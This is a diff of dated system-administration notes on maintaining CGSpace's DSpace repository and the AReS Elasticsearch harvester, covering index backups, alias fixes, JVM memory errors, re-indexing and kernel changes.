                                                                                                                                                                  $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-08
                                                                                                                                                                  -# start harvesting on AReS
                                                                                                                                                                  -
                                                                                                                                                                    +
                                                                                                                                                                    $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                    +$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-08
                                                                                                                                                                    +# start harvesting on AReS
                                                                                                                                                                    +
                                                                                                                                                                    • As I saw on my local test instance, even when you cancel a harvesting, it replaces the openrxv-items-final index with whatever is in openrxv-items-temp automatically, so I assume it will do the same now

                                                                                                                                                                    2021-03-09

                                                                                                                                                                    @@ -434,8 +434,8 @@ $ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items
                                                                                                                                                                -
                                                                                                                                                                $ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.txt -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                -

                                                                                                                                                                2021-03-10

                                                                                                                                                                +
                                                                                                                                                                $ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.txt -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                +

                                                                                                                                                                2021-03-10

                                                                                                                                                                • Colleagues from ICARDA asked about how we should handle ISI journals in CG Core, as CGSpace uses cg.isijournal and MELSpace uses mel.impact-factor
                                                                                                                                                                    @@ -444,12 +444,12 @@ $ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items
                                                                                                                                                                  • Peter said he doesn’t see “Source Code” or “Software” in the output type facet on the ILRI community, but I see it on the home page, so I will try to do a full Discovery re-index:
                                                                                                                                                                  -
                                                                                                                                                                  $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                  -
                                                                                                                                                                  -real    318m20.485s
                                                                                                                                                                  -user    215m15.196s
                                                                                                                                                                  -sys     2m51.529s
                                                                                                                                                                  -
                                                                                                                                                                    +
                                                                                                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                    +
                                                                                                                                                                    +real    318m20.485s
                                                                                                                                                                    +user    215m15.196s
                                                                                                                                                                    +sys     2m51.529s
                                                                                                                                                                    +
                                                                                                                                                                    • Now I see ten items for “Source Code” in the facets…
                                                                                                                                                                    • Add GPL and MIT licenses to the list of licenses on CGSpace input form since we will start capturing more software and source code
                                                                                                                                                                    • Added the ability to check dcterms.license values against the SPDX licenses in the csv-metadata-quality tool
                                                                                                                                                                    @@ -467,34 +467,34 @@ sys 2m51.529s
                                                                                                                                                                      • Switch to linux-kvm kernel on linode20 and linode18:
                                                                                                                                                                      -
                                                                                                                                                                      # apt update && apt full-upgrade
                                                                                                                                                                      -# apt install linux-kvm
                                                                                                                                                                      -# apt remove linux-generic linux-image-generic linux-headers-generic linux-firmware
                                                                                                                                                                      -# apt autoremove && apt autoclean
                                                                                                                                                                      -# reboot
                                                                                                                                                                      -
                                                                                                                                                                        +
                                                                                                                                                                        # apt update && apt full-upgrade
                                                                                                                                                                        +# apt install linux-kvm
                                                                                                                                                                        +# apt remove linux-generic linux-image-generic linux-headers-generic linux-firmware
                                                                                                                                                                        +# apt autoremove && apt autoclean
                                                                                                                                                                        +# reboot
                                                                                                                                                                        +
                                                                                                                                                                        • Deploy latest changes from 6_x-prod branch on CGSpace
                                                                                                                                                                        • Deploy latest changes from OpenRXV master branch on AReS
                                                                                                                                                                        • Last week Peter added OpenRXV to CGSpace: https://hdl.handle.net/10568/112982
                                                                                                                                                                        • Back up the current openrxv-items-final index on AReS to start a new harvest:
                                                                                                                                                                        -
                                                                                                                                                                        $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                        -$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-14
                                                                                                                                                                        -$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                        -
                                                                                                                                                                          +
                                                                                                                                                                          $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                          +$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-14
                                                                                                                                                                          +$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                          +
                                                                                                                                                                          • After the harvesting finished it seems the indexes got messed up again, as openrxv-items is an alias of openrxv-items-temp instead of openrxv-items-final:
                                                                                                                                                                          -
                                                                                                                                                                          $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                          -...
                                                                                                                                                                          -    "openrxv-items-final": {
                                                                                                                                                                          -        "aliases": {}
                                                                                                                                                                          -    },
                                                                                                                                                                          -    "openrxv-items-temp": {
                                                                                                                                                                          -        "aliases": {
                                                                                                                                                                          -            "openrxv-items": {}
                                                                                                                                                                          -        }
                                                                                                                                                                          -    },
                                                                                                                                                                          -
                                                                                                                                                                            +
                                                                                                                                                                            $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                            +...
                                                                                                                                                                            +    "openrxv-items-final": {
                                                                                                                                                                            +        "aliases": {}
                                                                                                                                                                            +    },
                                                                                                                                                                            +    "openrxv-items-temp": {
                                                                                                                                                                            +        "aliases": {
                                                                                                                                                                            +            "openrxv-items": {}
                                                                                                                                                                            +        }
                                                                                                                                                                            +    },
                                                                                                                                                                            +
                                                                                                                                                                            • Anyways, the number of items in openrxv-items seems OK and the AReS Explorer UI is working fine
                                                                                                                                                                              • I will have to manually fix the indexes before the next harvest
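The alias check above can be scripted rather than read by eye. This is a minimal sketch, assuming the JSON shape shown in the `_alias` output; the helper names `indexes_for_alias` and `alias_move_actions` are hypothetical and not part of OpenRXV. The request body uses the `add` and `remove` actions of the Elasticsearch `_aliases` endpoint, which are applied together in one call. Note that this only repoints the alias and copies no documents, so it is only useful once the target index actually holds the harvested items.

```python
import json


def indexes_for_alias(alias_map, alias):
    """Return the sorted names of all indexes that carry the given alias."""
    return sorted(
        index
        for index, info in alias_map.items()
        if alias in info.get("aliases", {})
    )


def alias_move_actions(alias, wrong_index, right_index):
    """Build an _aliases request body that moves the alias in a single call."""
    return {
        "actions": [
            {"remove": {"index": wrong_index, "alias": alias}},
            {"add": {"index": right_index, "alias": alias}},
        ]
    }


if __name__ == "__main__":
    # Same structure as the `curl -s 'http://localhost:9200/_alias/'` output above.
    sample = {
        "openrxv-items-final": {"aliases": {}},
        "openrxv-items-temp": {"aliases": {"openrxv-items": {}}},
    }
    print(indexes_for_alias(sample, "openrxv-items"))
    body = alias_move_actions(
        "openrxv-items", "openrxv-items-temp", "openrxv-items-final"
    )
    # This body could be sent with: curl -X POST 'http://localhost:9200/_aliases' -d '...'
    print(json.dumps(body))
```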
                                                                                                                                                                              • @@ -535,54 +535,54 @@ $ curl -X PUT "localhost:9200/openrxv-items-fina
                                                                                                                                                                              • Back up the current openrxv-items-final index to start a fresh AReS Harvest:
                                                                                                                                                                              -
                                                                                                                                                                              $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                              -$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-21
                                                                                                                                                                              -$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                              -
                                                                                                                                                                                +
                                                                                                                                                                                $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                +$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-21
                                                                                                                                                                                +$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                +
                                                                                                                                                                                • Then start harvesting in the AReS Explorer admin UI
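The three-step backup above (block writes, clone, unblock writes) could be wrapped so that writes are re-enabled even when the clone fails. This is a sketch only, assuming the same `localhost:9200` endpoint as the curl commands; `backup_steps`, `send` and `backup_index` are hypothetical helper names, and nothing here is part of OpenRXV itself.

```python
import json
import urllib.request

ES_URL = "http://localhost:9200"  # assumption: same host and port as the curl commands


def backup_steps(index, date_suffix):
    """Return the (method, path, body) requests for a write-blocked clone."""
    target = f"{index}-{date_suffix}"

    def write_block(flag):
        return {"settings": {"index.blocks.write": flag}}

    return [
        ("PUT", f"/{index}/_settings", write_block(True)),
        ("POST", f"/{index}/_clone/{target}", None),
        ("PUT", f"/{index}/_settings", write_block(False)),
    ]


def send(method, path, body=None):
    """Send one JSON request to Elasticsearch and return the decoded reply."""
    data = json.dumps(body).encode() if body is not None else None
    request = urllib.request.Request(
        ES_URL + path,
        data=data,
        method=method,
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(request) as response:
        return json.load(response)


def backup_index(index, date_suffix):
    """Clone the index under a dated name, always lifting the write block after."""
    block, clone, unblock = backup_steps(index, date_suffix)
    send(*block)
    try:
        return send(*clone)
    finally:
        send(*unblock)  # runs even if the clone request raised an HTTP error
```

Calling `backup_index("openrxv-items-final", "2021-03-21")` would issue the same three requests as the commands above. Comparing `_count` on the source and the clone afterwards would be a reasonable extra check before starting the harvest.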

                                                                                                                                                                                2021-03-22

                                                                                                                                                                                • The harvesting on AReS yesterday completed, but somehow I have twice the number of items:
                                                                                                                                                                                -
                                                                                                                                                                                $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                                                                                                                                                                -{
                                                                                                                                                                                -  "count" : 206204,
                                                                                                                                                                                -  "_shards" : {
                                                                                                                                                                                -    "total" : 1,
                                                                                                                                                                                -    "successful" : 1,
                                                                                                                                                                                -    "skipped" : 0,
                                                                                                                                                                                -    "failed" : 0
                                                                                                                                                                                -  }
                                                                                                                                                                                -}
                                                                                                                                                                                -
                                                                                                                                                                                  +
                                                                                                                                                                                  $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                                                                                                                                                                  +{
                                                                                                                                                                                  +  "count" : 206204,
                                                                                                                                                                                  +  "_shards" : {
                                                                                                                                                                                  +    "total" : 1,
                                                                                                                                                                                  +    "successful" : 1,
                                                                                                                                                                                  +    "skipped" : 0,
                                                                                                                                                                                  +    "failed" : 0
                                                                                                                                                                                  +  }
                                                                                                                                                                                  +}
                                                                                                                                                                                  +
                                                                                                                                                                                  • Hmmm and even my backup index has a strange number of items:
                                                                                                                                                                                  -
                                                                                                                                                                                  $ curl -s 'http://localhost:9200/openrxv-items-final-2021-03-21/_count?q=*&pretty'
                                                                                                                                                                                  -{
                                                                                                                                                                                  -  "count" : 844,
                                                                                                                                                                                  -  "_shards" : {
                                                                                                                                                                                  -    "total" : 1,
                                                                                                                                                                                  -    "successful" : 1,
                                                                                                                                                                                  -    "skipped" : 0,
                                                                                                                                                                                  -    "failed" : 0
                                                                                                                                                                                  -  }
                                                                                                                                                                                  -}
                                                                                                                                                                                  -
                                                                                                                                                                                    +
                                                                                                                                                                                    $ curl -s 'http://localhost:9200/openrxv-items-final-2021-03-21/_count?q=*&pretty'
                                                                                                                                                                                    +{
                                                                                                                                                                                    +  "count" : 844,
                                                                                                                                                                                    +  "_shards" : {
                                                                                                                                                                                    +    "total" : 1,
                                                                                                                                                                                    +    "successful" : 1,
                                                                                                                                                                                    +    "skipped" : 0,
                                                                                                                                                                                    +    "failed" : 0
                                                                                                                                                                                    +  }
                                                                                                                                                                                    +}
                                                                                                                                                                                    +
                                                                                                                                                                                    • I deleted all indexes and re-created the openrxv-items alias:
                                                                                                                                                                                    -
                                                                                                                                                                                    $ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                    -$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                                    -...
                                                                                                                                                                                    -    "openrxv-items-temp": {
                                                                                                                                                                                    -        "aliases": {}
                                                                                                                                                                                    -    },
                                                                                                                                                                                    -    "openrxv-items-final": {
                                                                                                                                                                                    -        "aliases": {
                                                                                                                                                                                    -            "openrxv-items": {}
                                                                                                                                                                                    -        }
                                                                                                                                                                                    -    }
                                                                                                                                                                                    -
                                                                                                                                                                                      +
                                                                                                                                                                                      $ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                      +$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                                      +...
                                                                                                                                                                                      +    "openrxv-items-temp": {
                                                                                                                                                                                      +        "aliases": {}
                                                                                                                                                                                      +    },
                                                                                                                                                                                      +    "openrxv-items-final": {
                                                                                                                                                                                      +        "aliases": {
                                                                                                                                                                                      +            "openrxv-items": {}
                                                                                                                                                                                      +        }
                                                                                                                                                                                      +    }
                                                                                                                                                                                      +
                                                                                                                                                                                      • Then I started a new harvest
                                                                                                                                                                                      • I switched the Node.js in the Ansible infrastructure scripts to v12 since v10 will cease to be supported soon
                                                                                                                                                                                          @@ -591,26 +591,26 @@ $ curl -s 'http://localhost:9200/_alias/'
                                                                                                                                                                                        • The AReS harvest finally finished, with 1047 pages of items, but the openrxv-items-final index is empty and the openrxv-items-temp index has a 103,000 items:
                                                                                                                                                                                        -
                                                                                                                                                                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                        -{
                                                                                                                                                                                        -  "count" : 103162,
                                                                                                                                                                                        -  "_shards" : {
                                                                                                                                                                                        -    "total" : 1,
                                                                                                                                                                                        -    "successful" : 1,
                                                                                                                                                                                        -    "skipped" : 0,
                                                                                                                                                                                        -    "failed" : 0
                                                                                                                                                                                        -  }
                                                                                                                                                                                        -}
                                                                                                                                                                                        -
                                                                                                                                                                                          +
                                                                                                                                                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                          +{
                                                                                                                                                                                          +  "count" : 103162,
                                                                                                                                                                                          +  "_shards" : {
                                                                                                                                                                                          +    "total" : 1,
                                                                                                                                                                                          +    "successful" : 1,
                                                                                                                                                                                          +    "skipped" : 0,
                                                                                                                                                                                          +    "failed" : 0
                                                                                                                                                                                          +  }
                                                                                                                                                                                          +}
                                                                                                                                                                                          +
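A minimal sketch of checking that response programmatically, assuming the body has been saved as a string. The function name `summarize_count` is hypothetical; the JSON is the response shown above.

```python
import json

# Response body copied from the _count call above.
COUNT_RESPONSE = """
{
  "count" : 103162,
  "_shards" : {
    "total" : 1,
    "successful" : 1,
    "skipped" : 0,
    "failed" : 0
  }
}
"""


def summarize_count(body):
    """Return (document count, True if no shard failed and all reported success)."""
    data = json.loads(body)
    shards = data["_shards"]
    all_ok = shards["failed"] == 0 and shards["successful"] == shards["total"]
    return data["count"], all_ok


count, all_ok = summarize_count(COUNT_RESPONSE)
print(count, all_ok)
```

Checking the shard counters alongside the count guards against trusting a number that came from a partially failed query.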
                                                                                                                                                                                          • I tried to clone the temp index to the final, but got an error:
                                                                                                                                                                                          -
                                                                                                                                                                                          $ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
                                                                                                                                                                                          -{"error":{"root_cause":[{"type":"resource_already_exists_exception","reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists","index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"}],"type":"resource_already_exists_exception","reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists","index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"},"status":400}% 
                                                                                                                                                                                          -
                                                                                                                                                                                            +
                                                                                                                                                                                            $ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
                                                                                                                                                                                            +{"error":{"root_cause":[{"type":"resource_already_exists_exception","reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists","index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"}],"type":"resource_already_exists_exception","reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists","index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"},"status":400}% 
                                                                                                                                                                                            +
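The error body says the clone was refused because the target index already exists. A small sketch of detecting that case from the response, assuming the body is available as a string; the helper name `existing_index_blocking_clone` is hypothetical, and the JSON is the response shown above.

```python
import json

# Response body copied from the failed _clone call above (without the trailing shell "%").
CLONE_RESPONSE = (
    '{"error":{"root_cause":[{"type":"resource_already_exists_exception",'
    '"reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists",'
    '"index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"}],'
    '"type":"resource_already_exists_exception",'
    '"reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists",'
    '"index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"},"status":400}'
)


def existing_index_blocking_clone(body):
    """Return the name of the index that already exists, or None for any other response."""
    error = json.loads(body).get("error")
    if not isinstance(error, dict):
        return None
    if error.get("type") != "resource_already_exists_exception":
        return None
    return error.get("index")


print(existing_index_blocking_clone(CLONE_RESPONSE))
```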
                                                                                                                                                                                            • I looked in the Docker logs for Elasticsearch and saw a few memory errors:
                                                                                                                                                                                            -
                                                                                                                                                                                            java.lang.OutOfMemoryError: Java heap space
                                                                                                                                                                                            -
                                                                                                                                                                                              +
                                                                                                                                                                                              java.lang.OutOfMemoryError: Java heap space
                                                                                                                                                                                              +
                                                                                                                                                                                              • According to /usr/share/elasticsearch/config/jvm.options in the Elasticsearch container, the default JVM heap is 1g
                                                                                                                                                                                                • The running Java process has -Xms 1g -Xmx 1g in its command line, so it is indeed using a 1g heap
                                                                                                                                                                                                • @@ -622,20 +622,20 @@ $ curl -s 'http://localhost:9200/_alias/'
                                                                                                                                                                                                -
                                                                                                                                                                                                    "openrxv-items-final": {
                                                                                                                                                                                                -        "aliases": {}
                                                                                                                                                                                                -    },
                                                                                                                                                                                                -    "openrxv-items-temp": {
                                                                                                                                                                                                -        "aliases": {
                                                                                                                                                                                                -            "openrxv-items": {}
                                                                                                                                                                                                -        }
                                                                                                                                                                                                -    },
                                                                                                                                                                                                -

                                                                                                                                                                                                2021-03-23

                                                                                                                                                                                                +
                                                                                                                                                                                                    "openrxv-items-final": {
                                                                                                                                                                                                +        "aliases": {}
                                                                                                                                                                                                +    },
                                                                                                                                                                                                +    "openrxv-items-temp": {
                                                                                                                                                                                                +        "aliases": {
                                                                                                                                                                                                +            "openrxv-items": {}
                                                                                                                                                                                                +        }
                                                                                                                                                                                                +    },
                                                                                                                                                                                                +

                                                                                                                                                                                                2021-03-23

                                                                                                                                                                                                • For reference you can also get the Elasticsearch JVM stats from the API:
                                                                                                                                                                                                -
                                                                                                                                                                                                $ curl -s 'http://localhost:9200/_nodes/jvm?human' | python -m json.tool
                                                                                                                                                                                                -
                                                                                                                                                                                                  +
                                                                                                                                                                                                  $ curl -s 'http://localhost:9200/_nodes/jvm?human' | python -m json.tool
                                                                                                                                                                                                  +
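A sketch of pulling just the heap ceiling out of that output instead of reading the whole document. The sample body below is hypothetical and heavily trimmed (node ID, name, and values are made up), and the `jvm.mem.heap_max_in_bytes` field path is an assumption about the response layout that should be checked against the real output.

```python
import json

# Hypothetical, trimmed stand-in for a `_nodes/jvm` response; not real output.
SAMPLE_NODES_JVM = """
{
  "nodes": {
    "node-1": {
      "name": "es01",
      "jvm": {
        "mem": {
          "heap_init_in_bytes": 1073741824,
          "heap_max_in_bytes": 1073741824
        }
      }
    }
  }
}
"""


def heap_max_gib_by_node(body):
    """Map each node name to its maximum heap in GiB (assumed field path)."""
    result = {}
    for node_id, info in json.loads(body).get("nodes", {}).items():
        heap_max = info.get("jvm", {}).get("mem", {}).get("heap_max_in_bytes")
        if heap_max is not None:
            # Fall back to the node ID when the node has no name field.
            result[info.get("name", node_id)] = heap_max / 1024**3
    return result


print(heap_max_gib_by_node(SAMPLE_NODES_JVM))
```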
                                                                                                                                                                                                  • I re-deployed AReS with 1.5GB of heap using the ES_JAVA_OPTS environment variable -
                                                                                                                                                                                                    $ curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                    -

                                                                                                                                                                                                    2021-03-24

                                                                                                                                                                                                    +
                                                                                                                                                                                                    $ curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                    +

                                                                                                                                                                                                    2021-03-24

                                                                                                                                                                                                    • Atmire responded to the ticket about the Duplicate Checker
                                                                                                                                                                                                        @@ -659,105 +659,105 @@ $ curl -s 'http://localhost:9200/_alias/'
                                                                                                                                                                                                      -
                                                                                                                                                                                                      # du -s /home/dspacetest.cgiar.org/solr/statistics
                                                                                                                                                                                                      -57861236        /home/dspacetest.cgiar.org/solr/statistics
                                                                                                                                                                                                      -
                                                                                                                                                                                                        +
                                                                                                                                                                                                        # du -s /home/dspacetest.cgiar.org/solr/statistics
                                                                                                                                                                                                        +57861236        /home/dspacetest.cgiar.org/solr/statistics
                                                                                                                                                                                                        +
                                                                                                                                                                                                        • I applied their changes to config/spring/api/atmire-cua-update.xml and started the duplicate processor:
                                                                                                                                                                                                        -
                                                                                                                                                                                                        $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx4096m'
                                                                                                                                                                                                        -$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 1000 -c statistics -t 12
                                                                                                                                                                                                        -
                                                                                                                                                                                                          +
                                                                                                                                                                                                          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx4096m'
                                                                                                                                                                                                          +$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 1000 -c statistics -t 12
                                                                                                                                                                                                          +
                                                                                                                                                                                                          • The default number of records per query is 10,000, which caused memory issues, so I will try with 1000 (Atmire used 100, but that seems too low!)
                                                                                                                                                                                                          • Hah, I still got a memory error after only a few minutes:
                                                                                                                                                                                                          -
                                                                                                                                                                                                          ...
                                                                                                                                                                                                          -Run 1 —  80% — 5,000/6,263 docs — 25s — 6m 31s                                      
                                                                                                                                                                                                          -Exception: GC overhead limit exceeded                                                                          
                                                                                                                                                                                                          -java.lang.OutOfMemoryError: GC overhead limit exceeded 
                                                                                                                                                                                                          -
                                                                                                                                                                                                            +
                                                                                                                                                                                                            ...
                                                                                                                                                                                                            +Run 1 —  80% — 5,000/6,263 docs — 25s — 6m 31s                                      
                                                                                                                                                                                                            +Exception: GC overhead limit exceeded                                                                          
                                                                                                                                                                                                            +java.lang.OutOfMemoryError: GC overhead limit exceeded 
                                                                                                                                                                                                            +
                                                                                                                                                                                                            • I guess we really do have to use -r 100
                                                                                                                                                                                                            • Now the thing runs for a few minutes and “finishes”:
                                                                                                                                                                                                            -
                                                                                                                                                                                                            $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 100 -c statistics -t 12
                                                                                                                                                                                                            -Loading @mire database changes for module MQM
                                                                                                                                                                                                            -Changes have been processed
                                                                                                                                                                                                            -
                                                                                                                                                                                                            -
                                                                                                                                                                                                            -*************************
                                                                                                                                                                                                            -* Update Script Started *
                                                                                                                                                                                                            -*************************
                                                                                                                                                                                                            -
                                                                                                                                                                                                            -Run 1
                                                                                                                                                                                                            -Start updating Solr Storage Reports | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                            -Deleting old storage docs from Solr... | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                            -Processing storage reports for type: eperson | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:42:41 CET 2021
                                                                                                                                                                                                            -Processing storage reports for type: group | Wed Mar 24 14:42:41 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:45:46 CET 2021
                                                                                                                                                                                                            -Processing storage reports for type: collection | Wed Mar 24 14:45:46 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:45:54 CET 2021
                                                                                                                                                                                                            -Processing storage reports for type: community | Wed Mar 24 14:45:54 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:45:58 CET 2021
                                                                                                                                                                                                            -Committing to Solr... | Wed Mar 24 14:45:58 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:45:59 CET 2021
                                                                                                                                                                                                            -Successfully finished updating Solr Storage Reports | Wed Mar 24 14:45:59 CET 2021
                                                                                                                                                                                                            -Run 1 —   2% — 100/4,824 docs — 3m 47s — 3m 47s
                                                                                                                                                                                                            -Run 1 —   4% — 200/4,824 docs — 2s — 3m 50s
                                                                                                                                                                                                            -Run 1 —   6% — 300/4,824 docs — 2s — 3m 53s
                                                                                                                                                                                                            -Run 1 —   8% — 400/4,824 docs — 2s — 3m 55s
                                                                                                                                                                                                            -Run 1 —  10% — 500/4,824 docs — 2s — 3m 58s
                                                                                                                                                                                                            -Run 1 —  12% — 600/4,824 docs — 2s — 4m 1s
                                                                                                                                                                                                            -Run 1 —  15% — 700/4,824 docs — 2s — 4m 3s
                                                                                                                                                                                                            -Run 1 —  17% — 800/4,824 docs — 2s — 4m 6s
                                                                                                                                                                                                            -Run 1 —  19% — 900/4,824 docs — 2s — 4m 9s
                                                                                                                                                                                                            -Run 1 —  21% — 1,000/4,824 docs — 2s — 4m 11s
                                                                                                                                                                                                            -Run 1 —  23% — 1,100/4,824 docs — 2s — 4m 14s
                                                                                                                                                                                                            -Run 1 —  25% — 1,200/4,824 docs — 2s — 4m 16s
                                                                                                                                                                                                            -Run 1 —  27% — 1,300/4,824 docs — 2s — 4m 19s
                                                                                                                                                                                                            -Run 1 —  29% — 1,400/4,824 docs — 2s — 4m 22s
                                                                                                                                                                                                            -Run 1 —  31% — 1,500/4,824 docs — 2s — 4m 24s
                                                                                                                                                                                                            -Run 1 —  33% — 1,600/4,824 docs — 2s — 4m 27s
                                                                                                                                                                                                            -Run 1 —  35% — 1,700/4,824 docs — 2s — 4m 29s
                                                                                                                                                                                                            -Run 1 —  37% — 1,800/4,824 docs — 2s — 4m 32s
                                                                                                                                                                                                            -Run 1 —  39% — 1,900/4,824 docs — 2s — 4m 35s
                                                                                                                                                                                                            -Run 1 —  41% — 2,000/4,824 docs — 2s — 4m 37s
                                                                                                                                                                                                            -Run 1 —  44% — 2,100/4,824 docs — 2s — 4m 40s
                                                                                                                                                                                                            -Run 1 —  46% — 2,200/4,824 docs — 2s — 4m 42s
                                                                                                                                                                                                            -Run 1 —  48% — 2,300/4,824 docs — 2s — 4m 45s
                                                                                                                                                                                                            -Run 1 —  50% — 2,400/4,824 docs — 2s — 4m 48s
                                                                                                                                                                                                            -Run 1 —  52% — 2,500/4,824 docs — 2s — 4m 50s
                                                                                                                                                                                                            -Run 1 —  54% — 2,600/4,824 docs — 2s — 4m 53s
                                                                                                                                                                                                            -Run 1 —  56% — 2,700/4,824 docs — 2s — 4m 55s
                                                                                                                                                                                                            -Run 1 —  58% — 2,800/4,824 docs — 2s — 4m 58s
                                                                                                                                                                                                            -Run 1 —  60% — 2,900/4,824 docs — 2s — 5m 1s
                                                                                                                                                                                                            -Run 1 —  62% — 3,000/4,824 docs — 2s — 5m 3s
                                                                                                                                                                                                            -Run 1 —  64% — 3,100/4,824 docs — 2s — 5m 6s
                                                                                                                                                                                                            -Run 1 —  66% — 3,200/4,824 docs — 3s — 5m 9s
                                                                                                                                                                                                            -Run 1 —  68% — 3,300/4,824 docs — 2s — 5m 12s
                                                                                                                                                                                                            -Run 1 —  70% — 3,400/4,824 docs — 2s — 5m 14s
                                                                                                                                                                                                            -Run 1 —  73% — 3,500/4,824 docs — 2s — 5m 17s
                                                                                                                                                                                                            -Run 1 —  75% — 3,600/4,824 docs — 2s — 5m 20s
                                                                                                                                                                                                            -Run 1 —  77% — 3,700/4,824 docs — 2s — 5m 22s
                                                                                                                                                                                                            -Run 1 —  79% — 3,800/4,824 docs — 2s — 5m 25s
                                                                                                                                                                                                            -Run 1 —  81% — 3,900/4,824 docs — 2s — 5m 27s
                                                                                                                                                                                                            -Run 1 —  83% — 4,000/4,824 docs — 2s — 5m 30s
                                                                                                                                                                                                            -Run 1 —  85% — 4,100/4,824 docs — 2s — 5m 33s
                                                                                                                                                                                                            -Run 1 —  87% — 4,200/4,824 docs — 2s — 5m 35s
                                                                                                                                                                                                            -Run 1 —  89% — 4,300/4,824 docs — 2s — 5m 38s
                                                                                                                                                                                                            -Run 1 —  91% — 4,400/4,824 docs — 2s — 5m 41s
                                                                                                                                                                                                            -Run 1 —  93% — 4,500/4,824 docs — 2s — 5m 43s
                                                                                                                                                                                                            -Run 1 —  95% — 4,600/4,824 docs — 2s — 5m 46s
